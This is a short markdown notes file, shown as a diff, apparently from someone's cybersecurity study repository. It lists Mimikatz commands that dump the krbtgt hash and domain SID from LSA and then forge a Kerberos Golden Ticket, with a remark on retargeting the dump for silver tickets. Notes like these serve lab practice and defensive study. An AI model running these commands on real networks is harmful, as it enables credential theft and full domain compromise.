Shad47486/Cyber-Sec-Tool-Concepts-Framworks/Mimikatz/mimcommand.md

-# Commands:
+# Commands

 privilege::debug
     - ensure this outputs [privilege '20' ok]

 lsadump::lsa /inject /name:krbtgt
     - This will dump the hash as well as the security identifier needed to create a Golden Ticket.
     - To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.

 kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id: